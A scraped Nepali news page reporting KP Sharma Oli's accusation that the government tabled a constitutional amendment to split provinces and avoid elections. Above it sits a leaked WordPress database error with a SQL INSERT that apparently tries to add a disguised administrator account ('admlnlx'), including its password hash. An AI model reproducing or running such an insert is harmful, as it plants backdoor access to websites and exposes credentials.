WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHMIPcy5RRNQFHWEJQkAdt5V.hcv1i.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 08:03:17', '', 'admlnlx', 'admlnlx')
काठमान्डों,मंसिर २०-
नेकपा एमालेका अध्यक्ष केपी शर्मा ओलीले सकारले चुनाव नगर्ने चाहना अनुसार संविधान संशोधन प्रस्ताव संसदमा दर्ता गरेको आरोप लगाएका छन्। आइतबार एमाले प्रचार विभागले आयोजना गरेको कार्यक्रममा सम्पादकहरुसँग उनले संविधान संशोधन प्रस्ताव तत्काल फिर्ता लिन सरकारलाई आग्रह गरे। ओलीले प्रदेशहरु टुक्र्याउँदै जाने योजना अनुसार सरकारले संसदमा संविधान संशोधन प्रस्ताव दर्ता गरेको आरोप लगाएका छन्। अहिले ५ नम्बर प्रदेशबाट पहाडी जिल्ला टुक्र्याउन खोजिएपनि पछि अरु प्रदेशहरु पनि टुक्र्याउने योजना अनुसार संविधान संशोधन प्रस्ताव दर्ता गरिएको उनले दावी गरे।
ओलीले अहिलेको संविधान अनुसार सीमांकन हेरफेर नै गर्न नमिल्ने बताए। सरकारले संविधान संशोधन प्रस्ताव पेश गरेको ५ दिनपछि प्रमुख प्रतिपक्षी दलका नेता ओलीको प्रतिक्रिया आएको हो। सरकारले संविधान कार्यान्वयनको सन्दर्भमा एक पाइलो पनि नसारेको दावी गर्दै अध्यक्ष ओलीले अहिलेको संविधान अनुसार सीमांकन हेरफेर पनि गर्न नमिल्ने दावी गरे। संविधान संशोधनबारे प्रतिपक्षसँग बुँदागत छलफल पनि नगरेको पनि ओलीले बताए। उनले छिमेकीहरुले अनावश्यक हस्तक्षेप गरेको भन्दै स्वतन्त्र रुपमा चल्न दिन आग्रह गरे। भारततर्फ संकेत गर्दै उनले भने ‘सके हामीलाई सहयोग गर्नुस् नत्र नगिज्याउनुस्, हामीलाई चल्न दिनुस्।’